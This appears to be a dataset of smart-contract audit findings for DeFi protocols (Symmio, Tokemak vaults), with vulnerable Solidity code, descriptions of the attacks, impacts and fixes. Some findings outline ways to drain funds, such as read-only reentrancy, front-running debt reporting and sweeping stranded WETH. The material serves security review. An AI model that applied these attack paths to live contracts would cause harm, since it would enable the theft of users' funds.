amountWith18Decimals = (amount * 1e18) /\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n AccountFacetImpl.allocate(amountWith18Decimals);\\n```\\n -PartyBFacetImpl.chargeFundingRate should check whether quoteIds is empty array to prevent partyANonces from being increased, causing some operations of partyA to failчmediumч```\\nFile: symmio-core\\contracts\\facets\\PartyB\\PartyBFacetImpl.sol\\n function chargeFundingRate(\\n address partyA,\\n uint256[] memory quoteIds,\\n int256[] memory rates,\\n PairUpnlSig memory upnlSig\\n ) internal {\\n LibMuon.verifyPairUpnl(upnlSig, msg.sender, partyA);\\n require(quoteIds.length == rates.length, \"PartyBFacet: Length not match\");\\n int256 partyBAvailableBalance = LibAccount.partyBAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyB,\\n msg.sender,\\n partyA\\n );\\n int256 partyAAvailableBalance = LibAccount.partyAAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyA,\\n partyA\\n );\\n uint256 epochDuration;\\n uint256 windowTime;\\n for (uint256 i = 0; i < quoteIds.length; i++) {\\n// rest of code// rest of code//quoteIds is empty array, so code is never executed.\\n }\\n require(partyAAvailableBalance >= 0, \"PartyBFacet: PartyA will be insolvent\");\\n require(partyBAvailableBalance >= 0, \"PartyBFacet: PartyB will be insolvent\");\\n AccountStorage.layout().partyBNonces[msg.sender][partyA] += 1;\\n394:-> AccountStorage.layout().partyANonces[partyA] += 1;\\n }\\n```\\n\\nAs long as partyBAvailableBalance(L318) and partyAAvailableBalance(L323) are greater than or equal to 0, that is to say, PartyA and PartyB are solvent. Then, partyB can add 1 to `partyANonces[partyA]` at little cost which is the gas of tx.\\n```\\nFile: symmio-core\\contracts\\facets\\PartyA\\PartyAFacetImpl.sol\\n function forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n// rest of code// rest of code//assume codes here are executed\\n273:-> LibMuon.verifyPairUpnlAndPrice(upnlSig, quote.partyB, quote.partyA, quote.symbolId);\\n// rest of code// rest of code\\n }\\n```\\n\\nIf the current price goes against partyB, then partyB can front-run `forceClosePosition` and call `chargeFundingRate` to increase the nonces of both parties by 1. In this way, partyA's `forceClosePosition` will inevitably revert because the nonces are incorrect.ч```\\nFile: symmio-core\\contracts\\facets\\PartyB\\PartyBFacetImpl.sol\\n function chargeFundingRate(\\n address partyA,\\n uint256[] memory quoteIds,\\n int256[] memory rates,\\n PairUpnlSig memory upnlSig\\n ) internal {\\n LibMuon.verifyPairUpnl(upnlSig, msg.sender, partyA);\\n317:- require(quoteIds.length == rates.length, \"PartyBFacet: Length not match\");\\n317:+ require(quoteIds.length > 0 && quoteIds.length == rates.length, \"PartyBFacet: Length is 0 or Length not match\");\\n```\\nчDue to this issue, partyB can increase nonces of any partyA with little cost, causing some operations of partyA to fail (refer to the Vulnerability Detail section). This opens up the opportunity for partyB to turn the table.ч```\\nFile: symmio-core\\contracts\\facets\\PartyB\\PartyBFacetImpl.sol\\n function chargeFundingRate(\\n address partyA,\\n uint256[] memory quoteIds,\\n int256[] memory rates,\\n PairUpnlSig memory upnlSig\\n ) internal {\\n LibMuon.verifyPairUpnl(upnlSig, msg.sender, partyA);\\n require(quoteIds.length == rates.length, \"PartyBFacet: Length not match\");\\n int256 partyBAvailableBalance = LibAccount.partyBAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyB,\\n msg.sender,\\n partyA\\n );\\n int256 partyAAvailableBalance = LibAccount.partyAAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyA,\\n partyA\\n );\\n uint256 epochDuration;\\n uint256 windowTime;\\n for (uint256 i = 0; i < quoteIds.length; i++) {\\n// rest of code// rest of code//quoteIds is empty array, so code is never executed.\\n }\\n require(partyAAvailableBalance >= 0, \"PartyBFacet: PartyA will be insolvent\");\\n require(partyBAvailableBalance >= 0, \"PartyBFacet: PartyB will be insolvent\");\\n AccountStorage.layout().partyBNonces[msg.sender][partyA] += 1;\\n394:-> AccountStorage.layout().partyANonces[partyA] += 1;\\n }\\n```\\n -Stat calculator returns incorrect report for swETHчhighчThe purpose of the in-scope `SwEthEthOracle` contract is to act as a price oracle specifically for swETH (Swell ETH) per the comment in the contract below and the codebase's README\\n```\\nFile: SwEthEthOracle.sol\\n/**\\n * @notice Price oracle specifically for swEth (Swell Eth).\\n * @dev getPriceEth is not a view fn to support reentrancy checks. Does not actually change state.\\n */\\ncontract SwEthEthOracle is SystemComponent, IPriceOracle {\\n```\\n\\nPer the codebase in the contest repository, the price oracle for the swETH is understood to be configured to the `SwEthEthOracle` contract at Line 252 below.\\n```\\nFile: RootOracleIntegrationTest.t.sol\\n swEthOracle = new SwEthEthOracle(systemRegistry, IswETH(SWETH_MAINNET));\\n..SNIP..\\n // Lst special pricing case setup\\n // priceOracle.registerMapping(SFRXETH_MAINNET, IPriceOracle(address(sfrxEthOracle)));\\n priceOracle.registerMapping(WSTETH_MAINNET, IPriceOracle(address(wstEthOracle)));\\n priceOracle.registerMapping(SWETH_MAINNET, IPriceOracle(address(swEthOracle)));\\n```\\n\\nThus, in the context of this audit, the price oracle for the swETH is mapped to the `SwEthEthOracle` contract.\\nBoth the swETH oracle and calculator use the same built-in `swEth.swETHToETHRate` function to retrieve the price of swETH in ETH.\\nLST Oracle Calculator Rebasing\\nswETH SwEthEthOracle - `swEth.swETHToETHRate()` SwethLSTCalculator - `IswETH(lstTokenAddress).swETHToETHRate()` False\\n```\\nFile: SwEthEthOracle.sol\\n /// @inheritdoc IPriceOracle\\n function getPriceInEth(address token) external view returns (uint256 price) {\\n..SNIP..\\n // Returns in 1e18 precision.\\n price = swEth.swETHToETHRate();\\n }\\n```\\n\\n```\\nFile: SwethLSTCalculator.sol\\n function calculateEthPerToken() public view override returns (uint256) {\\n return IswETH(lstTokenAddress).swETHToETHRate();\\n }\\n```\\n\\nWithin the `LSTCalculatorBase.current` function, assume that the `swEth.swETHToETHRate` function returns $x$ when called. In this case, the `price` at Line 203 below and `backing` in Line 210 below will be set to $x$ since the `getPriceInEth` and `calculateEthPerToken` functions depend on the same `swEth.swETHToETHRate` function internally. Thus, `priceToBacking` will always be 1e18:\\n$$ \\begin{align} priceToBacking &= \\frac{price \\times 1e18}{backing} \\ &= \\frac{x \\times 1e18}{x} \\ &= 1e18 \\end{align} $$\\nSince `priceToBacking` is always 1e18, the `premium` will always be zero:\\n$$ \\begin{align} premium &= priceToBacking - 1e18 \\ &= 1e18 - 1e18 \\ &= 0 \\end{align} $$\\nAs a result, the calculator for swETH will always report the wrong statistic report for swETH. If there is a premium or discount, the calculator will wrongly report none.\\n```\\nFile: LSTCalculatorBase.sol\\n function current() external returns (LSTStatsData memory) {\\n..SNIP..\\n IRootPriceOracle pricer = systemRegistry.rootPriceOracle();\\n uint256 price = pricer.getPriceInEth(lstTokenAddress);\\n..SNIP..\\n uint256 backing = calculateEthPerToken();\\n // price is always 1e18 and backing is in eth, which is 1e18\\n priceToBacking = price * 1e18 / backing;\\n }\\n\\n // positive value is a premium; negative value is a discount\\n int256 premium = int256(priceToBacking) - 1e18;\\n\\n return LSTStatsData({\\n lastSnapshotTimestamp: lastSnapshotTimestamp,\\n baseApr: baseApr,\\n premium: premium,\\n slashingCosts: slashingCosts,\\n slashingTimestamps: slashingTimestamps\\n });\\n }\\n```\\nчWhen handling the swETH within the `LSTCalculatorBase.current` function, consider other methods of obtaining the fair market price of swETH that do not rely on the `swEth.swETHToETHRate` function such as external 3rd-party price oracle.чThe purpose of the stats/calculators contracts is to store, augment, and clean data relevant to the LMPs. When the solver proposes a rebalance, the strategy uses the stats contracts to calculate a composite return (score) for the proposed destinations. Using that composite return, it determines if the swap is beneficial for the vault.\\nIf a stat calculator provides inaccurate information, it can cause multiple implications that lead to losses to the protocol, such as false signals allowing the unprofitable rebalance to be executed.ч```\\nFile: SwEthEthOracle.sol\\n/**\\n * @notice Price oracle specifically for swEth (Swell Eth).\\n * @dev getPriceEth is not a view fn to support reentrancy checks. Does not actually change state.\\n */\\ncontract SwEthEthOracle is SystemComponent, IPriceOracle {\\n```\\n -Incorrect approach to tracking the PnL of a DVчhighчLet $DV_A$ be a certain destination vault.\\nAssume that at $T0$, the current debt value (currentDvDebtValue) of $DV_A$ is 95 WETH, and the last debt value (updatedDebtBasis) is 100 WETH. Since the current debt value has become smaller than the last debt value, the vault is making a loss of 5 WETH since the last rebalancing, so $DV_A$ is sitting at a loss, and users can only burn a limited amount of DestinationVault_A's shares.\\nAssume that at $T1$, there is some slight rebalancing performed on $DV_A$, and a few additional LP tokens are deposited to it. Thus, its current debt value increased to 98 WETH. At the same time, the `destInfo.debtBasis` and `destInfo.ownedShares` will be updated to the current value.\\nImmediately after the rebalancing, $DV_A$ will not be considered sitting in a loss since the `currentDvDebtValue` and `updatedDebtBasis` should be equal now. As a result, users could now burn all the $DV_A$ shares of the LMPVault during withdrawal.\\n$DV_A$ suddenly becomes not sitting at a loss even though the fact is that it is still sitting at a loss of 5 WETH. The loss has been written off.\\n```\\nFile: LMPDebt.sol\\n // Neither of these numbers include rewards from the DV\\n if (currentDvDebtValue < updatedDebtBasis) {\\n // We are currently sitting at a loss. Limit the value we can pull from\\n // the destination vault\\n currentDvDebtValue = currentDvDebtValue.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n currentDvShares = currentDvShares.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n }\\n```\\nчConsider a more sophisticated approach to track a DV's Profit and Loss (PnL).\\nIn our example, $DV_A$ should only be considered not making a loss if the price of the LP tokens starts to appreciate and cover the loss of 5 WETH.чA DV might be incorrectly marked as not sitting in a loss, thus allowing users to burn all the DV shares, locking in all the loss of the DV and the vault shareholders.ч```\\nFile: LMPDebt.sol\\n // Neither of these numbers include rewards from the DV\\n if (currentDvDebtValue < updatedDebtBasis) {\\n // We are currently sitting at a loss. Limit the value we can pull from\\n // the destination vault\\n currentDvDebtValue = currentDvDebtValue.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n currentDvShares = currentDvShares.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n }\\n```\\n -Price returned by Oracle is not verifiedчmediumчAs per the example provided by Tellor on how to integrate the Tellor oracle into the system, it has shown the need to check that the price returned by the oracle is not zero.\\n```\\nfunction getTellorCurrentValue(bytes32 _queryId)\\n ..SNIP..\\n // retrieve most recent 20+ minute old value for a queryId. the time buffer allows time for a bad value to be disputed\\n (, bytes memory data, uint256 timestamp) = tellor.getDataBefore(_queryId, block.timestamp - 20 minutes);\\n uint256 _value = abi.decode(data, (uint256));\\n if (timestamp == 0 || _value == 0) return (false, _value, timestamp);\\n```\\n\\nThus, the value returned from the `getDataBefore` function should be verified to ensure that the price returned by the oracle is not zero. However, this was not implemented.\\n```\\nFile: TellorOracle.sol\\n function getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n }\\n```\\nчUpdate the affected function as follows.\\n```\\nfunction getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp // Remove the line below\\n 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n// Remove the line below\\n if (timestampRetrieved == 0 || timestamp // Remove the line below\\n timestampRetrieved > tokenPricingTimeout) {\\n// Add the line below\\n if (timestampRetrieved == 0 || value == 0 || timestamp // Remove the line below\\n timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n}\\n```\\nчThe protocol relies on the oracle to provide accurate pricing for many critical operations, such as determining the debt values of DV, calculators/stats used during the rebalancing process, NAV/shares of the LMPVault, and determining how much assets the users should receive during withdrawal.\\nIf an incorrect value of zero is returned from Tellor, affected assets within the protocol will be considered worthless.ч```\\nfunction getTellorCurrentValue(bytes32 _queryId)\\n ..SNIP..\\n // retrieve most recent 20+ minute old value for a queryId. the time buffer allows time for a bad value to be disputed\\n (, bytes memory data, uint256 timestamp) = tellor.getDataBefore(_queryId, block.timestamp - 20 minutes);\\n uint256 _value = abi.decode(data, (uint256));\\n if (timestamp == 0 || _value == 0) return (false, _value, timestamp);\\n```\\n -ETH deposited by the user may be stolen.чhighчIn the `deposit` function, if the user pays with ETH, it will first call `_processEthIn` to wrap it and then call `pullToken` to transfer.\\n```\\n /// @inheritdoc ILMPVaultRouterBase\\n function deposit(\\n ILMPVault vault,\\n address to,\\n uint256 amount,\\n uint256 minSharesOut\\n ) public payable virtual override returns (uint256 sharesOut) {\\n // handle possible eth\\n _processEthIn(vault);\\n\\n IERC20 vaultAsset = IERC20(vault.asset());\\n pullToken(vaultAsset, amount, address(this));\\n\\n return _deposit(vault, to, amount, minSharesOut);\\n }\\n```\\n\\n`_processEthIn` will wrap ETH into WETH, and these WETH belong to the contract itself.\\n```\\n function _processEthIn(ILMPVault vault) internal {\\n // if any eth sent, wrap it first\\n if (msg.value > 0) {\\n // if asset is not weth, revert\\n if (address(vault.asset()) != address(weth9)) {\\n revert InvalidAsset();\\n }\\n\\n // wrap eth\\n weth9.deposit{ value: msg.value }();\\n }\\n }\\n```\\n\\nHowever, `pullToken` transfers from `msg.sender` and does not use the WETH obtained in `_processEthIn`.\\n```\\n function pullToken(IERC20 token, uint256 amount, address recipient) public payable {\\n token.safeTransferFrom(msg.sender, recipient, amount);\\n }\\n```\\n\\nIf the user deposits 10 ETH and approves 10 WETH to the contract, when the deposit amount is 10, all of the user's 20 WETH will be transferred into the contract.\\nHowever, due to the `amount` being 10, only 10 WETH will be deposited into the vault, and the remaining 10 WETH can be stolen by the attacker using `sweepToken`.\\n```\\n function sweepToken(IERC20 token, uint256 amountMinimum, address recipient) public payable {\\n uint256 balanceToken = token.balanceOf(address(this));\\n if (balanceToken < amountMinimum) revert InsufficientToken();\\n\\n if (balanceToken > 0) {\\n token.safeTransfer(recipient, balanceToken);\\n }\\n }\\n```\\n\\nBoth `mint` and `deposit` in `LMPVaultRouterBase` have this problem.чPerform operations based on the size of `msg.value` and amount:\\nmsg.value == amount: transfer WETH from contract not `msg.sender`\\nmsg.value > amount: transfer WETH from contract not `msg.sender` and refund to `msg.sender`\\nmsg.value < amount: transfer WETH from contract and transfer remaining from `msg.sender`чETH deposited by the user may be stolen.ч```\\n /// @inheritdoc ILMPVaultRouterBase\\n function deposit(\\n ILMPVault vault,\\n address to,\\n uint256 amount,\\n uint256 minSharesOut\\n ) public payable virtual override returns (uint256 sharesOut) {\\n // handle possible eth\\n _processEthIn(vault);\\n\\n IERC20 vaultAsset = IERC20(vault.asset());\\n pullToken(vaultAsset, amount, address(this));\\n\\n return _deposit(vault, to, amount, minSharesOut);\\n }\\n```\\n -Destination Vault rewards are not added to idleIncrease when info.totalAssetsPulled > info.totalAssetsToPullчhighчIn the `_withdraw` function, Destination Vault rewards will be first recorded in `info.IdleIncrease` by `info.idleIncrease += _baseAsset.balanceOf(address(this)) - assetPreBal - assetPulled;`.\\nBut when `info.totalAssetsPulled` > info.totalAssetsToPull, `info.idleIncrease` is directly assigned as `info.totalAssetsPulled` - info.totalAssetsToPull, and `info.totalAssetsPulled` is `assetPulled` without considering Destination Vault rewards.\\n```\\n uint256 assetPreBal = _baseAsset.balanceOf(address(this));\\n uint256 assetPulled = destVault.withdrawBaseAsset(sharesToBurn, address(this));\\n\\n // Destination Vault rewards will be transferred to us as part of burning out shares\\n // Back into what that amount is and make sure it gets into idle\\n info.idleIncrease += _baseAsset.balanceOf(address(this)) - assetPreBal - assetPulled;\\n info.totalAssetsPulled += assetPulled;\\n info.debtDecrease += totalDebtBurn;\\n\\n // It's possible we'll get back more assets than we anticipate from a swap\\n // so if we do, throw it in idle and stop processing. You don't get more than we've calculated\\n if (info.totalAssetsPulled > info.totalAssetsToPull) {\\n info.idleIncrease = info.totalAssetsPulled - info.totalAssetsToPull;\\n info.totalAssetsPulled = info.totalAssetsToPull;\\n break;\\n }\\n```\\n\\nFor example,\\n```\\n // preBal == 100 pulled == 10 reward == 5 toPull == 6\\n // idleIncrease = 115 - 100 - 10 == 5\\n // totalPulled(0) += assetPulled == 10 > toPull\\n // idleIncrease = totalPulled - toPull == 4 < reward\\n```\\n\\nThe final `info.idleIncrease` does not record the reward, and these assets are not ultimately recorded by the Vault.ч`info.idleIncrease = info.totalAssetsPulled - info.totalAssetsToPull;` -> `info.idleIncrease += info.totalAssetsPulled - info.totalAssetsToPull;`чThe final `info.idleIncrease` does not record the reward, and these assets are not ultimately recorded by the Vault.\\nMeanwhile, due to the `recover` function's inability to extract the `baseAsset`, this will result in no operations being able to handle these Destination Vault rewards, ultimately causing these assets to be frozen within the contract.ч```\\n uint256 assetPreBal = _baseAsset.balanceOf(address(this));\\n uint256 assetPulled = destVault.withdrawBaseAsset(sharesToBurn, address(this));\\n\\n // Destination Vault rewards will be transferred to us as part of burning out shares\\n // Back into what that amount is and make sure it gets into idle\\n info.idleIncrease += _baseAsset.balanceOf(address(this)) - assetPreBal - assetPulled;\\n info.totalAssetsPulled += assetPulled;\\n info.debtDecrease += totalDebtBurn;\\n\\n // It's possible we'll get back more assets than we anticipate from a swap\\n // so if we do, throw it in idle and stop processing. You don't get more than we've calculated\\n if (info.totalAssetsPulled > info.totalAssetsToPull) {\\n info.idleIncrease = info.totalAssetsPulled - info.totalAssetsToPull;\\n info.totalAssetsPulled = info.totalAssetsToPull;\\n break;\\n }\\n```\\n -Liquidations miss delegate call to swapperчhighчThe LiquidationRow contract is an orchestrator for the claiming process. It is primarily used to collect rewards for vaults. It has a method called liquidateVaultsForToken. Based on docs this method is for: Conducts the liquidation process for a specific token across a list of vaults, performing the necessary balance adjustments, initiating the swap process via the asyncSwapper, taking a fee from the received amount, and queues the remaining swapped tokens in the MainRewarder associated with each vault.\\n```\\nfunction liquidateVaultsForToken(\\n address fromToken,\\n address asyncSwapper,\\n IDestinationVault[] memory vaultsToLiquidate,\\n SwapParams memory params\\n) external nonReentrant hasRole(Roles.LIQUIDATOR_ROLE) onlyWhitelistedSwapper(asyncSwapper) {\\n uint256 gasBefore = gasleft();\\n\\n (uint256 totalBalanceToLiquidate, uint256[] memory vaultsBalances) =\\n _prepareForLiquidation(fromToken, vaultsToLiquidate);\\n _performLiquidation(\\n gasBefore, fromToken, asyncSwapper, vaultsToLiquidate, params, totalBalanceToLiquidate, vaultsBalances\\n );\\n}\\n```\\n\\nThe second part of the function is performing the liquidation by calling _performLiquidation. A problem is at the beginning of it. IAsyncSwapper is called to swap tokens.\\n```\\nfunction _performLiquidation(\\n uint256 gasBefore,\\n address fromToken,\\n address asyncSwapper,\\n IDestinationVault[] memory vaultsToLiquidate,\\n SwapParams memory params,\\n uint256 totalBalanceToLiquidate,\\n uint256[] memory vaultsBalances\\n) private {\\n uint256 length = vaultsToLiquidate.length;\\n // the swapper checks that the amount received is greater or equal than the params.buyAmount\\n uint256 amountReceived = IAsyncSwapper(asyncSwapper).swap(params);\\n // // rest of code\\n}\\n```\\n\\nAs you can see the LiquidationRow doesn't transfer the tokens to swapper and swapper doesn't pul them either (swap function here). Because of this the function reverses.\\nI noticed that there is no transfer back to LiquidationRow from Swapper either. Tokens can't get in or out.\\nWhen I searched the codebase, I found that Swapper is being called on another place using the delegatecall method. This way it can operate with the tokens of the caller. The call can be found here - LMPVaultRouter.sol:swapAndDepositToVault. So I think that instead of missing transfer, the problem is actually in the way how swapper is called.чChange the async swapper call from the normal function call to the low-level delegatecall function the same way it is done in LMPVaultRouter.sol:swapAndDepositToVault.\\nI would like to address that AsyncSwapperMock in LiquidationRow.t.sol is a poorly written mock and should be updated to represent how the AsyncSwapper work. It would be nice to update the test suite for LiquidationRow because its current state won't catch this. If you check the LiquidationRow.t.sol tests, the mock swap function only mints tokens, no need to use delegatecall. This is why tests missed this vulnerability.чRewards collected through LiquidationRow claimsVaultRewards get stuck in the contract. Liquidation can't be called because it reverts when Swapper tries to work with tokens it doesn't possess.ч```\\nfunction liquidateVaultsForToken(\\n address fromToken,\\n address asyncSwapper,\\n IDestinationVault[] memory vaultsToLiquidate,\\n SwapParams memory params\\n) external nonReentrant hasRole(Roles.LIQUIDATOR_ROLE) onlyWhitelistedSwapper(asyncSwapper) {\\n uint256 gasBefore = gasleft();\\n\\n (uint256 totalBalanceToLiquidate, uint256[] memory vaultsBalances) =\\n _prepareForLiquidation(fromToken, vaultsToLiquidate);\\n _performLiquidation(\\n gasBefore, fromToken, asyncSwapper, vaultsToLiquidate, params, totalBalanceToLiquidate, vaultsBalances\\n );\\n}\\n```\\n -When `queueNewRewards` is called, caller could transfer tokens more than it should beчhighчInside `queueNewRewards`, irrespective of whether we're near the start or the end of a reward period, if the accrued rewards are too large relative to the new rewards (queuedRatio is greater than newRewardRatio), the new rewards will be added to the queue (queuedRewards) rather than being immediately distributed.\\n```\\n function queueNewRewards(uint256 newRewards) external onlyWhitelisted {\\n uint256 startingQueuedRewards = queuedRewards;\\n uint256 startingNewRewards = newRewards;\\n\\n newRewards += startingQueuedRewards;\\n\\n if (block.number >= periodInBlockFinish) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n uint256 elapsedBlock = block.number - (periodInBlockFinish - durationInBlock);\\n uint256 currentAtNow = rewardRate * elapsedBlock;\\n uint256 queuedRatio = currentAtNow * 1000 / newRewards;\\n\\n if (queuedRatio < newRewardRatio) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n queuedRewards = newRewards;\\n }\\n }\\n\\n emit QueuedRewardsUpdated(startingQueuedRewards, startingNewRewards, queuedRewards);\\n\\n // Transfer the new rewards from the caller to this contract.\\n IERC20(rewardToken).safeTransferFrom(msg.sender, address(this), newRewards);\\n }\\n```\\n\\nHowever, when this function tried to pull funds from sender via `safeTransferFrom`, it used `newRewards` amount, which already added by `startingQueuedRewards`. If previously `queuedRewards` already have value, the processed amount will be wrong.чUpdate the transfer to use `startingNewRewards` instead of `newRewards` :\\n```\\n function queueNewRewards(uint256 newRewards) external onlyWhitelisted {\\n uint256 startingQueuedRewards = queuedRewards;\\n uint256 startingNewRewards = newRewards;\\n\\n newRewards // Add the line below\\n= startingQueuedRewards;\\n\\n if (block.number >= periodInBlockFinish) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n uint256 elapsedBlock = block.number // Remove the line below\\n (periodInBlockFinish // Remove the line below\\n durationInBlock);\\n uint256 currentAtNow = rewardRate * elapsedBlock;\\n uint256 queuedRatio = currentAtNow * 1000 / newRewards;\\n\\n if (queuedRatio < newRewardRatio) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n queuedRewards = newRewards;\\n }\\n }\\n\\n emit QueuedRewardsUpdated(startingQueuedRewards, startingNewRewards, queuedRewards);\\n\\n // Transfer the new rewards from the caller to this contract.\\n// Remove the line below\\n IERC20(rewardToken).safeTransferFrom(msg.sender, address(this), newRewards);\\n// Add the line below\\n IERC20(rewardToken).safeTransferFrom(msg.sender, address(this), startingNewRewards);\\n }\\n```\\nчThere are two possible issue here :\\nIf previously `queuedRewards` is not 0, and the caller don't have enough funds or approval, the call will revert due to this logic error.\\nIf previously `queuedRewards` is not 0, and the caller have enough funds and approval, the caller funds will be pulled more than it should (reward param + `queuedRewards` )ч```\\n function queueNewRewards(uint256 newRewards) external onlyWhitelisted {\\n uint256 startingQueuedRewards = queuedRewards;\\n uint256 startingNewRewards = newRewards;\\n\\n newRewards += startingQueuedRewards;\\n\\n if (block.number >= periodInBlockFinish) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n uint256 elapsedBlock = block.number - (periodInBlockFinish - durationInBlock);\\n uint256 currentAtNow = rewardRate * elapsedBlock;\\n uint256 queuedRatio = currentAtNow * 1000 / newRewards;\\n\\n if (queuedRatio < newRewardRatio) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n queuedRewards = newRewards;\\n }\\n }\\n\\n emit QueuedRewardsUpdated(startingQueuedRewards, startingNewRewards, queuedRewards);\\n\\n // Transfer the new rewards from the caller to this contract.\\n IERC20(rewardToken).safeTransferFrom(msg.sender, address(this), newRewards);\\n }\\n```\\n -Curve V2 Vaults can be drained because CurveV2CryptoEthOracle can be reentered with WETH tokensчhighч`CurveV2CryptoEthOracle.registerPool` takes `checkReentrancy` parameters and this should be True only for pools that have `0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE` tokens and this is validated here.\\n```\\naddress public constant ETH = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;\\n\\n// rest of code\\n\\n// Only need ability to check for read-only reentrancy for pools containing native Eth.\\nif (checkReentrancy) {\\n if (tokens[0] != ETH && tokens[1] != ETH) revert MustHaveEthForReentrancy();\\n}\\n```\\n\\nThis Oracle is meant for Curve V2 pools and the ones I've seen so far use WETH address instead of `0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE` (like Curve V1) and this applies to all pools listed by Tokemak.\\nFor illustration, I'll use the same pool used to test proper registration. The test is for `CRV_ETH_CURVE_V2_POOL` but this applies to other V2 pools including rETH/ETH. The pool address for `CRV_ETH_CURVE_V2_POOL` is 0x8301AE4fc9c624d1D396cbDAa1ed877821D7C511 while token address is 0xEd4064f376cB8d68F770FB1Ff088a3d0F3FF5c4d.\\nIf you interact with the pool, the coins are: 0 - WETH - 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2 1 - CRV - 0xD533a949740bb3306d119CC777fa900bA034cd52\\nSo how can WETH be reentered?! Because Curve can accept ETH for WETH pools.\\nA look at the pool again shows that Curve uses python kwargs and it includes a variable `use_eth` for `exchange`, `add_liquidity`, `remove_liquidity` and `remove_liquidity_one_coin`.\\n```\\ndef exchange(i: uint256, j: uint256, dx: uint256, min_dy: uint256, use_eth: bool = False) -> uint256:\\ndef add_liquidity(amounts: uint256[N_COINS], min_mint_amount: uint256, use_eth: bool = False) -> uint256:\\ndef remove_liquidity(_amount: uint256, min_amounts: uint256[N_COINS], use_eth: bool = False):\\ndef remove_liquidity_one_coin(token_amount: uint256, i: uint256, min_amount: uint256, use_eth: bool = False) -> uint256:\\n```\\n\\nWhen `use_eth` is `true`, it would take `msg.value` instead of transfer WETH from user. And it would make a raw call instead of transfer WETH to user.\\nIf raw call is sent to user, then they could reenter LMP vault and attack the protocol and it would be successful cause CurveV2CryptoEthOracle would not check for reentrancy in getPriceInEth\\n```\\n// Checking for read only reentrancy scenario.\\nif (poolInfo.checkReentrancy == 1) {\\n // This will fail in a reentrancy situation.\\n cryptoPool.claim_admin_fees();\\n}\\n```\\n\\nA profitable attack that could be used to drain the vault involves\\nDeposit shares at fair price\\nRemove liquidity on Curve and updateDebtReporting in LMPVault with view only reentrancy\\nWithdraw shares at unfair priceчIf CurveV2CryptoEthOracle is meant for CurveV2 pools with WETH (and no 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE), then change the ETH address to weth. As far as I can tell Curve V2 uses WETH address for ETH but this needs to be verified.\\n```\\n- if (tokens[0] != ETH && tokens[1] != ETH) revert MustHaveEthForReentrancy();\\n+ if (tokens[0] != WETH && tokens[1] != WETH) revert MustHaveEthForReentrancy();\\n```\\nчThe protocol could be attacked with price manipulation using Curve read only reentrancy. The consequence would be fatal because `getPriceInEth` is used for evaluating debtValue and this evaluation decides shares and debt that would be burned in a withdrawal. Therefore, an inflated value allows attacker to withdraw too many asset for their shares. This could be abused to drain assets on LMPVault.\\nThe attack is cheap, easy and could be bundled in as a flashloan attack. And it puts the whole protocol at risk cause a large portion of their deposit would be on Curve V2 pools with WETH token.ч```\\naddress public constant ETH = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;\\n\\n// rest of code\\n\\n// Only need ability to check for read-only reentrancy for pools containing native Eth.\\nif (checkReentrancy) {\\n if (tokens[0] != ETH && tokens[1] != ETH) revert MustHaveEthForReentrancy();\\n}\\n```\\n -updateDebtReporting can be front run, putting all the loss on later withdrawals but taking the profitчhighчupdateDebtReporting takes in a user input of destinations in array whose debt to report, so if a destination vault is incurring loss and is not on the front of withdrawalQueue than a attacker can just update debt for only the destination which are incurring a profit and withdraw in the same txn. He will exit the vault with profit, others who withdraw after the legit updateDebtReporting txn will suffer even more loss than they should have, as some part of the profit which was used to offset the loss was taken by the attacker and protocol fees\\nPOC-\\nLMPVault has 2000 in deposits 1000 from alice 